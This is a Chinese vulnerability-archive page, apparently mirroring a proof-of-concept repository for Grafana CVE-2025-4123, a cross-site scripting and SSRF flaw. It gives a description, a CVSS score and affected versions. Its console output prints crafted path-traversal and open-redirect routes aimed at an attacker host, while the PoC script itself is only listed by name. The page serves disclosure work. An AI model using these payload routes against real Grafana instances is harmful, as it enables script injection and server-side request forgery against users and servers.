关联漏洞
标题:Grafana 安全漏洞 (CVE-2025-4123)Description:Grafana是Grafana开源的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana存在安全漏洞,该漏洞源于客户端路径遍历和开放重定向结合,可能导致跨站脚本攻击。
Description
CVE-2025-4123
介绍
# Blackash-CVE-2025-4123
CVE-2025-4123
CVE ID: "CVE-2025-4123"
Severity: High
Base Score: 7.6 HIGH 🔴
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
Impact: Server-Side Request Forgery (SSRF), Cross-Site Scripting
Affected Versions: Grafana 11.2, Grafana 11.3, Grafana 11.4, Grafana 11.5, Grafana 11.6, Grafana 12.0
# Description
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF. The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.
```
❯ sudo python server.py --host http://127.0.0.1
[+] Using attacker host: http://127.0.0.1
[+] XSS Route: /a/..%2f..%2f..%2fpublic%2f..%252f%255C127.0.0.1%252f%253Fp%252f..%252f..%23/explore
[+] SSRF Route: /render/public/..%252f%5Chttp://127.0.0.1%252f%3F%252f..%252f..
* Serving Flask app 'server'
* Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:80
* Running on http://192.168.100.2:80
Press CTRL+C to quit
```
文件快照
[4.0K] /data/pocs/26e837a2b47cfd27c15c310ada91e547207a81c2
├── [2.6K] CVE-2025-4123.py
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →